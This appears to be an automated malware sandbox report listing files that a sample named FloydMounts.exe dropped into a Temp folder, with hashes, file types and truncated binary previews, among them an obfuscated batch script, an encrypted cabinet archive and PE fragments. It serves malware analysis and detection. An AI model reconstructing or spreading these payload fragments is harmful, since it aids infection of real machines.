                                                                                            Preview:..............................................................................................................?E...@...@..?E...@..?E.F>E..?E..@E..@E..?E.....U..Q.U.SVW.r....E............u..u...R....._^[..]........(...P..3..$.(.@..u.Q......_^[..]....u...R.9..._^[..]....E...PR.Y....L...._^[..]...j..E...PR....._^[..]...8.m.....'O....l......?O....h....^0..t..N ......N..w...j8V..........h...2...m.....d..._^[..]....u...R.%..._^[..].....m......d.....h......N...R..E.B....R.._^[..]....u...R..N.._^[..]....u....PN.._^[..]....u.Q....Q.._^[..]....E...PR...._^[..]...j..E...PR...._^[..]....u...R..L.._^[..]...j..E...PR...._^[..]....o.@.vEE.e.@.e.@...@...@...@...@...@...@...@.vEE.vEE.vEE.RDE.Q.@.bDE.rDE..DE..DE..DE..DE...@..DE...@...@..DE..DE.*EE...@...@...@.vEE.UEE.fEE.vEE.vEE.vEE.vEE..EE..DE.....U......S.].3.VW...E......s...}..E......E......E.........$........@.f..AtUf..N......f..O......f..Rt;f..G......f..H......f..St!f..Tt.f..Ut.f..Vt.f......N.......u........U..E...E......83..}.E.E.9..3

                                                                                            C:\Users\user\AppData\Local\Temp\Blvd

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\FloydMounts.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):8007
                                                                                            Entropy (8bit):5.1937108112219
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:oxPFgwb+W4q0Pl/onswN1OGfreek0k6DvznG88ePAciTTi7p:obxHTGposAjxk56fbOY7p
                                                                                            MD5:0F4371FEDD805D205169F1F77DB16001
                                                                                            SHA1:8135CD7E0B547538473356FC3819F54094B5ECF3
                                                                                            SHA-256:31D64EF03D4E461C506B133B6A4887A983FC3C92ED318306C257843FE5F87074
                                                                                            SHA-512:FAEC381E17EBBA9334C9269AF37DEA914106AF0F6EABAEFFE13D1827E65BC38ED480AF2E3399BC99D11B255EEFA1E1E7E516FC90FEC055A9B720E5431CCFB459
                                                                                            Malicious:false
                                                                                            Preview:Set Bike=Y..qaoEvolution-Textbook-Blocking-Aids-Coach-..ltrCommunications-Excessive-Stolen-Watt-Chevrolet-Shelf-Audi-..SgCgi-..lXxHeated-Calm-Republic-Named-Gift-Tramadol-Gnu-Herself-S-..nqREnemy-Waste-Saturday-Had-Webster-Poet-Lending-Relevance-..DYATCloudy-Hormone-Tested-Attend-..BPXdSender-..nCzMurphy-Allowed-Abuse-Insulin-Sample-..JQQuite-Hungary-Playlist-Copyrighted-Committees-Orchestra-Supplied-Amber-Whilst-..Set Marco=z..VYTeachers-Drain-Absorption-..EPlgMv-Terrorists-Instances-Window-Relying-Tn-Supporters-Hometown-..eHYAPrize-Puerto-..MARWishlist-Hey-Sluts-Filme-Trans-Scott-Rope-..UvxConvicted-..Set Pg=r..fsjEgypt-Love-Technological-Ease-..QhStCreature-Pussy-Livesex-..LgdsFormat-..DvInline-Tired-Crawford-..EAGirlfriend-Preparing-..OKPDem-Glen-Baseball-Prototype-..cnzYea-..CgYfCigarettes-Recovered-Ben-Orgasm-Sorry-Stolen-Now-Dishes-..ErAids-Arkansas-Trail-Aids-Journalist-Uses-Bind-Physically-..Set Grams=H..RSESupplemental-Notices-Hazards-Sec-Consultation-Ja-Delivery-Bible-Cloth-

                                                                                            C:\Users\user\AppData\Local\Temp\Blvd.cmd (copy)

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):8007
                                                                                            Entropy (8bit):5.1937108112219
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:oxPFgwb+W4q0Pl/onswN1OGfreek0k6DvznG88ePAciTTi7p:obxHTGposAjxk56fbOY7p
                                                                                            MD5:0F4371FEDD805D205169F1F77DB16001
                                                                                            SHA1:8135CD7E0B547538473356FC3819F54094B5ECF3
                                                                                            SHA-256:31D64EF03D4E461C506B133B6A4887A983FC3C92ED318306C257843FE5F87074
                                                                                            SHA-512:FAEC381E17EBBA9334C9269AF37DEA914106AF0F6EABAEFFE13D1827E65BC38ED480AF2E3399BC99D11B255EEFA1E1E7E516FC90FEC055A9B720E5431CCFB459
                                                                                            Malicious:false
                                                                                            Preview:Set Bike=Y..qaoEvolution-Textbook-Blocking-Aids-Coach-..ltrCommunications-Excessive-Stolen-Watt-Chevrolet-Shelf-Audi-..SgCgi-..lXxHeated-Calm-Republic-Named-Gift-Tramadol-Gnu-Herself-S-..nqREnemy-Waste-Saturday-Had-Webster-Poet-Lending-Relevance-..DYATCloudy-Hormone-Tested-Attend-..BPXdSender-..nCzMurphy-Allowed-Abuse-Insulin-Sample-..JQQuite-Hungary-Playlist-Copyrighted-Committees-Orchestra-Supplied-Amber-Whilst-..Set Marco=z..VYTeachers-Drain-Absorption-..EPlgMv-Terrorists-Instances-Window-Relying-Tn-Supporters-Hometown-..eHYAPrize-Puerto-..MARWishlist-Hey-Sluts-Filme-Trans-Scott-Rope-..UvxConvicted-..Set Pg=r..fsjEgypt-Love-Technological-Ease-..QhStCreature-Pussy-Livesex-..LgdsFormat-..DvInline-Tired-Crawford-..EAGirlfriend-Preparing-..OKPDem-Glen-Baseball-Prototype-..cnzYea-..CgYfCigarettes-Recovered-Ben-Orgasm-Sorry-Stolen-Now-Dishes-..ErAids-Arkansas-Trail-Aids-Journalist-Uses-Bind-Physically-..Set Grams=H..RSESupplemental-Notices-Hazards-Sec-Consultation-Ja-Delivery-Bible-Cloth-

                                                                                            C:\Users\user\AppData\Local\Temp\Briefing

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\FloydMounts.exe
                                                                                            File Type:DOS executable (COM)
                                                                                            Category:dropped
                                                                                            Size (bytes):80896
                                                                                            Entropy (8bit):7.997764535653874
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:svMJtkzHNF//NSioSkKKS5dy7P/99PGc8qscYlQjUiLIoN6bQ8P+i:svstkzHN5/NSio5KK2dy7n99PGc8qO6a
                                                                                            MD5:833A38804CE5E440AB3DD45275910047
                                                                                            SHA1:73C3D2FEF9BC559094BDC4E40EC8111D70B65CB8
                                                                                            SHA-256:4AA965BC75ABAAB053598FD8B15B52A980CEE035BE5585143DB44FE9A810350F
                                                                                            SHA-512:FD1158472ED0DB8DDA376EE99A1EA892732442145B33BB35851C6052DDABD85B4EB8FEEA8E4700E5A8E6050C489706973858954A413CFEBC5DA2B60B83DBAA3A
                                                                                            Malicious:false
                                                                                            Preview:.....Er......f...`...W..f.......v9..>..:.`/\.........%..fYn....!.P..:..0.,......+Rr.W{v......@....+>..q"..cfsq.....;o6......@<.:..K...).(;].@.wb.Vt....k..m.u...tC....Z@$..@l.K.&%.E............>..[q...U ...y:'~..).A....2*^H.#.h{zo..#..%.X=.M.]f....?kuV..r....D.R.T.2e..#Z...f......S..jxh...z{....U...d6~.BU.....g..ji....0..E..%U........D.....e.....J.....Ut.!l..........NE.].....0.Y.T.=`*.....8.=.......n.L...H)}...E....\>..M2....T...Ww.E..F|2_xkD..PN...@T.b".s(}...09T3.3}.1.)..Y......4t...g.L[..".../Q.."..\h....X!.D.Y_..K0;f[...lO.=v.x...yq[^.k'.N..^...T....A5G.......~....ti4....z...d..-.i.....fIyi..X;..3..}{...R..Qh.8.7.....,..!.4-.....V..Z=.&.....[..~.h.]..../k......i.(...1.....M6.....wSD.....H7:...c.lNr......vv....l.......H......A..._.I....NH!.[.o...m.. ...#..8......Z.$[....H.C6.C.q..II..5....v;.N.8..^.....Aze.}....@m.U.T.S)j#d...$...E.7.s-......,..AC."LK[i.1..@.3|MMu}x#z".LN....\w....q7,.a..X.l.......DWi..s.R..N...g.m.28.......p.7..:y..V..

                                                                                            C:\Users\user\AppData\Local\Temp\Commander

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):151552
                                                                                            Entropy (8bit):6.711405673091829
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:CdTmRxlHS3NxrHSBRtNPnj0nEoXnmowS2u5hVOoQ7t8T6pUkBJRM:LHS3zcNPj0nEo3tb2j6AUkBk
                                                                                            MD5:4BF49C43B91525D14EE465C7E9F11C9B
                                                                                            SHA1:C2E2A210C6E15C41BAB0139CDBC1C709B0A80263
                                                                                            SHA-256:CEC066181C67B67E3C19C6E11419885909A8DCFB896F08C6F39A48B39C318ED7
                                                                                            SHA-512:923532B88967848AAD6D6C92B1911A574AEF771C5DC96B05556EEA0F799FEC231FCF3CB2800A2BB9A952638EE963A12E68606BEF945F65F570434A1B989CEF44
                                                                                            Malicious:false
                                                                                            Preview:.....U...P..$....j..7.V......p........j..7.@.........$...Q.V...........D$@.............j........u..D$..L$.Pjp..........D$......W.............P..$....j..6..............p.........j..6.................{...Q.....p.........f...Q.....[...........@.......E.......@..@...@..PQ. ....B....u..M..E.j.P.E.PS.*c........... ...u$.M..E.j.P.E.PS.Q............U.u..U..K....f.x.Nt.......8.......j..E.FP.E..u..u...PS..............U...u..M.............t[3...j....I#M..M.............c...........~pj........~e.u.j.j.V..........tQj.j.V.........(........tv3......I#M..A..x..~#j.j..m....M.P.....M..E.P....e....M.h..I...I...M..|....M..E......E......f....E......E......'...j.h..L.j.h......../....y..K..E........@.Ph.....q....M.......E......E...........N..E.;.......P.*........8........E..E.j.P.E...PS.n............E.P.M......u......2...............2...............2.........2....M...t...............................2.............................................M......M...t..F.........=..........@

                                                                                            C:\Users\user\AppData\Local\Temp\Consultants

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1980
                                                                                            Entropy (8bit):4.969305279778163
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:x9n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhfx:bSEA5O5W+MfH5Z
                                                                                            MD5:1DA7785DE3B9D1CED7073E03EDBE289C
                                                                                            SHA1:404895EF60693310385E91D0497CAAF920159C26
                                                                                            SHA-256:D373C92A1EEDF063CDA60CD520E98FC3A3BF322B6C6EB48069C727C30AB1D255
                                                                                            SHA-512:6C83904CEA715A1FC345168C8DF76DB0421A5719D15EAE3AD2D5B05D5C6918BA2960AAC8866FC832900A6E0AB49EF58CF42B00CF793C730573C4B11450CFCE50
                                                                                            Malicious:false
                                                                                            Preview:nightlife........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.......................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\Contribute

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\FloydMounts.exe
                                                                                            File Type:Microsoft Cabinet archive data, 488471 bytes, 10 files, at 0x2c +A "Operator" +A "Administration", ID 8699, number 1, 29 datablocks, 0x1 compression
                                                                                            Category:dropped
                                                                                            Size (bytes):488471
                                                                                            Entropy (8bit):7.998330151005352
                                                                                            Encrypted:true
                                                                                            SSDEEP:12288:EUSzEWFM6BZYt1qUnljhJ9mQnxNHM7lHdtcSc:E5wWFMkUpsQrcxcf
                                                                                            MD5:05439968BEF462C17439D4FFB063F499
                                                                                            SHA1:5581D9048CCDA203C4F6E6F38E7796501DFE5B69
                                                                                            SHA-256:6D2343E6A73B30C68BBDEC370C83DE63447DD23B03223FA1FD5B8C867A14D34D
                                                                                            SHA-512:8B74BAF84C8E942CB5FF061F1650DE1EDAEFD86982896236BAC2332B7F8C2B1999B879CC83D3445B557A6FCF6BB70BC2D57E975F7DAD7595954AF2449FCFAD25
                                                                                            Malicious:false
                                                                                            Preview:MSCF.....t......,................!..)..................Y@h .Operator..@.........Y@h .Administration..X...,.....Y@h .Revisions..P.........Y@h .Commander............Y@h .Freight............Y@h .Rose......x.....Y@h .Louisville............Y@h .Oregon......,.....Y@h .Consultants..@..a4.....Y@h .Array..304`I..CK...|....>.H2$.f..#...4......H.l@Jl0d7)$`?..U..dF.%.8...~....-.......W...n.y..$ $$....2..G.M...9..>.h......s.>.=.{.9..s.!......q..i.....Qz.Sjrf........>.k.n..P.,.%.de.%.vv!#q.v>.\7.=.;...tW..5.m..2..)VS+..c..kH.UM.9z.#..B...)Q..!(.$..O'X.........O....wB..........Y...c6..qUE.....%.V.LU.P.tUHS..U0..I.X5....1.q..2'......)RS.#..c..T..z.U...L.>......?.r.......3...<.#._..Zs4..D7.j...|....0.4.+..0. @....P..B.......Z...3N...B..B....[..f...3^^..j....(...0{...#.]..).$..X..s@.(...p.tD..F1(.0H....b.{..SNN....1.2.u..g3...|..0.4.3.P'.|...B..S*.F.k..K.N........3E~.r......q..L..E.....L...l..,.`.9M./....dLc.....c.{.=........3M..F..@..h........L....g..<....0.L.......x5...}.tD`E..).L

                                                                                            C:\Users\user\AppData\Local\Temp\Crimes

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\FloydMounts.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):90112
                                                                                            Entropy (8bit):7.997881907362051
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:0tTAp6qD2l5QhlCj5aKhglYdo6BuPUC8JR5Qij2BYvzNBb3eO71zXl/yF5Y5:0ep6qDkmhlCEKwYBBnZT5zN11zXY05
                                                                                            MD5:1263F3D83D0F3189B504B3A2EEE5E82E
                                                                                            SHA1:9651A79EA80391BFD28DD87BB56B5CC59E3C2A23
                                                                                            SHA-256:D50D4BB5A4D6F36B45989C3E42B11766DC8AE284631BBE9AABD5952BC1CC4D49
                                                                                            SHA-512:58D61FA08D62D825D572C401A30697949A47B5CEACEA2FF9B370DD08EEE0A1E0A9576AC16C8B5DC17ED3AC8E5EA53FE084372959ECBF6C413532B3A0D1E4EEF1
                                                                                            Malicious:false
                                                                                            Preview:.8.l(.B.Z.,.ec.x.T.s.v.B...3..m'.eT..7>..*P...v....9.......A~-...........K..].E..L...n..Lh.....).>L..'>..,^...'.......eZ.W+...q..xI.d.....v..U.....-P...}..q{FX @..^>.*nBK.;.<!9kd.....;.X...J3F.._J[a.0.!A....o..~.a.r...'.#../u..3ew..r...@.]...v'>.t..)!..d...'o..H.........s..O....5...( .W...q$........[7..>1+.........J..z.......9...;..`...x..v.`@.....H.....>..'.......nG.....V.ph.5#.....e....Y.jG.T<......S....C`.|..g..<....o..u.......W.d.cg..6.....W|...^..4....l..........k.....8.z.D.>....l`......I....*...$)U.H).....iZT....(....x..p.TQ..L........]..`.M2.w.l...Jj.b...7..L!...yC^w.c......%...B.`.........|Fe..#<.b.A......Z..s*...T..t"....yd....0..o.?Q.3.J..}.>y+.5,.F...t....J.-.:o.+t.....B<(. .s..D.....@..en/G..x1>..%h...q.T.S.k.<IzU9D.4..{I.{.n.&h...Vec.*..Mj.Xc.S.E...4...s....n...?.;wM.</.4W..=..|..A.<..d..eM...Y...~...J...p.k..Xf..G..X.+......SG..m[...%.T...*...!....5..R.w.Y...Dj;..c..q[{..,}..g....=G).L^.. _.T....m.O.v..........w.....e*

                                                                                            C:\Users\user\AppData\Local\Temp\Freight

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                            File Type:DOS executable (COM)
                                                                                            Category:dropped
                                                                                            Size (bytes):115712
                                                                                            Entropy (8bit):6.422620896534243
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:SfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRC2jfTq8c:SfhnvO5bLezWWt/Dd314V14ZgP0P
                                                                                            MD5:52E9DCF6A41C36F07FBDA1A058C58018
                                                                                            SHA1:2357E589652DCEA7B49324468E41D16825ED3A2B
                                                                                            SHA-256:1B629D5D9990C02C9648ABB5C7583F9CDB7D1DC8FE844AE0C8B293FBAC7CFFDB
                                                                                            SHA-512:E64DBFFEE6946E053CCEBB5D1BA388C83D680CF0D21D59C9AB2C6C2E70013907361000310E31CD1F4E070F43510A274E16C4D8E4B9D21BC0D5225100567D9478
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:.9....F.j5Y.M....].f9K..]..M.u(.u..M.;..u..M.t..E..M..0..F.....F..M.B.....jG..B....u.^f;.u........}.......t...B.Ph.....R....M.U.R...P...u....F......@.Ph.....+......E.PSV...f............E......F........A...U.f;E.......jNXf;.......jGXf;....................A..AjNXf9E.u).y..u#j..E..M.PSV...:...........u.S......}.......t...B.Ph................M.U.R...P.....S......F......@.Ph.........E..e......e....VPS.u..E..................E....@....f.x..t...@...Pjr._.........E....f..A.......u.M..9...E...P.E.P.E.P.E.Pj..:......M......C....td....RtQ...t3...t ...t..M..E.P....'.u..M...D...2.M..E.P.......M..E.P.AD...u..M..:.....u..M...J...E.P.M.......]..{..u...j..W:...u.M...8...E..P.E.PS......M....%C...M..%l...K.u.M..8...E...P.E.P.E.P.E.P.u..S......M......B....t.......u..u.V...X......M...B...M...k...M..E...I..M....u......Y_^[....S..QQ......U.k..l$....X.S.VW.{..R..M.jH.....^.u......f9p..u.u..D......@.Pjp........7....s..M......73.}..M..E.G........@.f;E.u.B..f;E.u.J..j@_f;.}.u...t...x

                                                                                            C:\Users\user\AppData\Local\Temp\Louisville

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):67584
                                                                                            Entropy (8bit):6.531397126063558
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:OuCYm9PrpmESvn+pqFqaynB6GMKY99z+ajU1Rjv18fRQLTh/Q:BCThpmESv+AqVnBypIbv18mLto
                                                                                            MD5:FE7B562D05513307015EBF2714856D68
                                                                                            SHA1:86FE3308383FE3D3DCB874A4E85550433F7A11D2
                                                                                            SHA-256:E3F9B57B35F6F389C6BE4D21F1FF2EDB49D3BB0ACE250F18098DCFA18639B942
                                                                                            SHA-512:C877E28DB16C5DCD250CF4691F8C7041042BC300352865D251C5DDFCF265E0A1D4C7937E8AFCDE758284993ECCC7BD93369CC4D0725C061AE5E6C1E7F87011B1
                                                                                            Malicious:false
                                                                                            Preview:.D$8Y;.u..L$,.T$(.......|$0..T$(.L$,u..t$`+.|$dx......D$$@.D$$...t".T$8.....D$$3.T$8A..;...H......|..t$D....;.u.h`~L..L$D.I....M.h..I.........@..|8...L8.t..I83.F.q..|8...L8.t..I83.Y..L$@..m..........S..p.I..D$.Ph4.J.VSh..J...X.I.....v....D$..T$<Rh..J.P........Q....D$<S.t$D..P.R.....0....M..5...j...j.V.....L$..D$|.....j.S.....SPQ.R..D$pP.L$T..B..P.L$.. ...j.j..D$.PV.5.......L$..iu...L$P.XL...D$..T$pSRP...Q .D$pP.L$T..A..P.L$......j.j..D$.PV.........L$...u...L$P..L...D$..T$pSRP...Q(.D$pP.L$T..A..P.L$.....j.j..D$.PV........L$...t...L$P..K...D$..T$pSRP...Q..D$pP.L$T.3A..P.L$..<...j.j..D$.PV.Q.......L$..t...L$P.tK...D$..T$hRS.T$x..RP.Q@.D$pP.L$T..@..P.L$......j.j..D$.PV.........L$..4t...L$P.#K...D$h3.D$.3.@.\$.j.P.D$$.D$.PV.........L$...s...D$..T$lRP...Q8.D$l.D$.3..\$.@j.P.D$$.D$.PV........L$...s.....H..D9.8\9.t..@8.X..D9.8\9.t..@8.X..D$<P...Q..D$.P...Q...t.I..L$@.pJ.._^3.[..]...U.....E...T....@.SVW.0.....m....F..L$.Q.0....I..]....u:....s...#.3.B.S....H..|9...D9.t..@8.P..|9...D9.t

                                                                                            C:\Users\user\AppData\Local\Temp\Loving

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\FloydMounts.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):71257
                                                                                            Entropy (8bit):7.997434754485162
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:vc17ck8WybuEralTCO+Jt3E6TI4c4aJ7fFL8nlNDxJ2DYdX:IFcuEWlTC3PE6TI4hSfBGNV3dX
                                                                                            MD5:EF2045147326C53A98C724608A59C3EC
                                                                                            SHA1:C786849FD3A1E58D89B273FF5A69D4D2EA227195
                                                                                            SHA-256:A29DC9679DA5367BFBD6664CBB4D173C8025B12A2C3F47D939D732740C42DD1E
                                                                                            SHA-512:E2D2272B1801CE952CC4DB7A745FABD9ADB1DBA04FA1BAEBEA22E0E646256F3C874B3CCD4049BD83287FF2F5E47BDA6C45E97AE97C6678FC943E211894A68892
                                                                                            Malicious:false
                                                                                            Preview:..e.G...%f..b..=S...[..w...A.?.-..W>..............-..4..<..V&T.V..L.c.}.qL|.S.2..5.|z_yT.yLN.....Jz&.............!..(.&...a.W..(...xp..%XPe....4z.../..R4./.......z}..omj...........J..6G..zGEB...j.KcjA>".C2w.2......@6p.P._...4IT..'....-....~.^P...{....%|a..>w..yx.T.u.....dQ...........JS.3.J..:......6}..g...k9p....IF...F4..Z...m.r...W..dx..UB.<.s..Iz..9...&.LP.......L.I....hg.n...].......t..g*....g....8.0q...tZ.zk..12....,..ax2..PE.8?....`*.s.%.W(.2.i.'S0.h....o.....[mXs.g.FX....eA..D.....@...q...a..S......._.[.<...6B_q.....m..`..... a..C.y.g.z?.>.~......6ok.Q.!...Pg....s~3.C.3E...._/M]......v.<q.k.r.....8K..d>;..j.d...%.`..py..n$.#-.G.qd/.?......B.9...3!..]w>.d...:8......0...:..~...Wm.G.".a<....l..M.4....u..:...E.].!.Io$...K!.&.:..G(<.7B.RS.0.z.<...T.............?lF .....g..D.....h\..9x........~...A..-L,L].....mK.,j.pS........E... ...P..t..o.MvY4wtj....?..A.^P.b......uD..%.m....~['.u.$qd..I..J6.e.2...a...l.......?.Oa.m4...U..m..X}..{....q3

                                                                                            C:\Users\user\AppData\Local\Temp\Operator

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):125952
                                                                                            Entropy (8bit):6.699399799740353
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:oDOSpQSAU4CE0Imbi80PtCZEMnVIPPBxT/sZX:oiS+SAhClbfSCOMVIPPL/sZX
                                                                                            MD5:B39CD19DFAF37474E079A9DC203FA3D8
                                                                                            SHA1:FAEAC9132BC11601618D39C6B2FEE885F32B7AAC
                                                                                            SHA-256:4609DEDD216879E267969C67F2176769AEA6C04BA385FC89EF7E5B84131336E4
                                                                                            SHA-512:4C8BFC7D4A8528A6504062AFA012C740D2914896EC1170FF847C2056EE2A0B9A1F74FDE2BADC64052CEA8F2C20002025AC6C26725A169275D73D3F1CBFC8AB7A
                                                                                            Malicious:false
                                                                                            Preview:.t.V.....Y......L......L...j ...Y+...3..;3._^[]..U..E.W.<...M.....t..A.....#..WS....,J.Vh....j.S..p.I.....u'..0.I...Wu.VVS..p.I.....3...u......3........t.V....I...^[_]..U..Q...L.3.E.V........t'.u(...u$.u .u..u..u..u..u..u.....I.... .u..u..u..u..u.j..u.....P..T.I..M.3.^.-.....].$...U..Q...L.3.E.Vh02J.h(2J.h02J.j..N..........t..u.......I.........I..M.3.^.......].....U..Q...L.3.E.VhD2J.h<2J.hD2J.j............u...t.......I.........I..M.3.^......].....U..Q...L.3.E.VhT2J.hL2J.hT2J.j...........u...t.......I.........I..M.3.^.+.....].....U..Q...L.3.E.Vhh2J.h`2J.hh2J.j..L.........u..u...t.......I.........I..M.3.^.......].....U..Q...L.3.E.Vh.2J.h.2J.h.2J.j.............t!.u ...u..u..u..u..u..u.....I.... .u..u..u..u..u.j..u......P....I..M.3.^.P.....].....U..Q...L.3.E.Vh.2J.h.2J.h.2J.j..q.........u...t.......I.......p.I..M.3.^.......].....U..Q...L.3.E.Vh.2J.h.2J.h.2J.j............u..u..u..u..u...t..u.......I.....j..u......P....I..M.3.^......].....U..Q...L.3.E.Vh.2J.h.2J.h.2J.j..

                                                                                            C:\Users\user\AppData\Local\Temp\Oregon

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                            File Type:DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 0.927448
                                                                                            Category:dropped
                                                                                            Size (bytes):109568
                                                                                            Entropy (8bit):5.774111787752619
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:xHsWccd0vtmgMbFuz08QuklMBNIimuzaAwusPL:xLeAg0Fuz08XvBNbjaAtsPL
                                                                                            MD5:B38C39C27B160E7666E2F40157F9A1AE
                                                                                            SHA1:763F5BE4AA26E962B1B118AD567502E8CCB4A8BD
                                                                                            SHA-256:3DD10056F6F9520B9CC627693CD6D41534EF67C517E12C36FF9A971484B27A94
                                                                                            SHA-512:D8D66494CAC6980D0AE49E9DC29E690EB7D3D2DAD5707BC9E75874FDA490DF37678F36C044DE78DFDF9B0601350259965373EE745E8D362C155230FD3502A9EB
                                                                                            Malicious:false
                                                                                            Preview:....>.......>...m0_$@......8C..`.a..=..`.a..=..@T.!.?sp....c;......`C.......<.......?...............?.......................UUUUUU...............?UUUUUU.?......*..l..l.V.4.V....>.......>...m0_$@......8C..`.a..=..`.a..=..@T.!.?sp....c;......`C.......<.......?...............?.......TZ...FJ..FJ..FJ..GJ.j.a.-.J.P...z.h.-.C.N...k.o.-.K.R...z.h.-.T.W...u.k.............@NJ.....HNJ.....PNJ.....XNJ.....hNJ.....pNJ.....xNJ......NJ......NJ......NJ......NJ......NJ......NJ......NJ......NJ......NJ......NJ......NJ......NJ......NJ......NJ......NJ......NJ......OJ......OJ......OJ......OJ..... OJ.....(OJ.....0OJ. ...8OJ.!...@OJ."....GJ.#...HOJ.$...POJ.%...XOJ.&...`OJ.'...hOJ.)...pOJ.*...xOJ.+....OJ.,....OJ.-....OJ./....OJ.6....OJ.7....OJ.8....OJ.9....OJ.>....OJ.?....OJ.@....OJ.A....OJ.C....OJ.D....OJ.F....OJ.G....OJ.I....PJ.J....PJ.K....PJ.N....PJ.O... PJ.P...(PJ.V...0PJ.W...8PJ.Z...@PJ.e...HPJ.....PPJ.....TPJ.....`PJ.....lPJ......GJ.....xPJ......PJ......PJ......PJ.....P+J......PJ......PJ......PJ....

                                                                                            C:\Users\user\AppData\Local\Temp\Pierre

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\FloydMounts.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):64512
                                                                                            Entropy (8bit):7.997477995008248
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:FTOqoFZvMVlJ03YFtVDEZPDLeX+DFSV+jnHDwQMu:1OqCvSMIFnYZWX+DFS+HDwlu
                                                                                            MD5:1C7D1FEE679FD719B3D49DFB22A926DB
                                                                                            SHA1:638F7B3E816B58547B9B045773117903ADE4B6B3
                                                                                            SHA-256:46997897E6014E82AEDDCD24736E1FD89DC5473C8BB2CA2A79038B223B268589
                                                                                            SHA-512:BF6624869C6123333F6E24A63CB1C21FE1DDAB999557439563139273AF3C580F170AC3F803880BE0A973A155DE64EC86C1041E44627EC2F7BF0C95E4751C962F
                                                                                            Malicious:false
                                                                                            Preview:B..e.@;...l.y.....4.W..O.......vy.....4B".kC...F...w..b.N+.TY.)..};.T].....I...*QIYj...Vk..+.........o]....,.C.f.t.....}...I.E..4..&........(..H\...(...a.Ql........Y.Fu..y....3+..{....U..m1..@.?..]......;.J.DW.0....k^.i.~......42.4.9Hi...O.....U=...$..Z'......A..."....7-...{n..0Y......H.V}>.wi..a......GV...@.)....t.N..7.W'.....#.*G.f..;.}.:..'B.J.....9....G(..(}$...F...k..%.z..Z.D.d....%....2J`2k.<T.".M...8Hn..........%.v...<...E...'.s.....N.N..S@..0...{.z2....6~.=.b#...`.\}#.'2 P.Q...T...R..EX".3...T..pR.EM..H....E3n.;hq..... f....5.._q..0?...n.+.C.fV..;v.........7^,RCjk.K.`_o..u.8.5.;.Ib.3R..Y.'|O.Z..L.(.!<w.5C........].v..E...`..[P.l.6.O.....0......oc.aKI."l.)r".W...o..-..HTt....g...!.h......h....|!..R...J....u..a.o........J..W....../.|.Sg.'"J.l.c.$.q.v$..HA9;.....7og........~..VIU6];1}9.iA...q$(.>..].....USmo.O...$ }.A.N2..t...,y/....Z2.jU.k?.K>.,. ...c.95....>.|...t..d%..4r....=.QC..).1;O$x-....8.)).>tH..S..k)..:..C:...k.*.)..Od.tHH

                                                                                            C:\Users\user\AppData\Local\Temp\Revisions

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):22693
                                                                                            Entropy (8bit):7.290066314329222
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:e/2ETHwWV8tnwmTihbn929MwO/ChZrzmZGhLdXVaeCVrVEVFJ8ZcGwGBk7/UMQ38:e/ZByLiFuO/ChgZ45VatJVEV3GPkjF
                                                                                            MD5:B6DDD900F49C22D202197E584E363F32
                                                                                            SHA1:C8CA94B5D673BD8DA83A72AEE4A451FC33CEB2FB
                                                                                            SHA-256:319D5C61161876C405D7A93E8DCD81001349B900B0CD9C1144639896F1AE9989
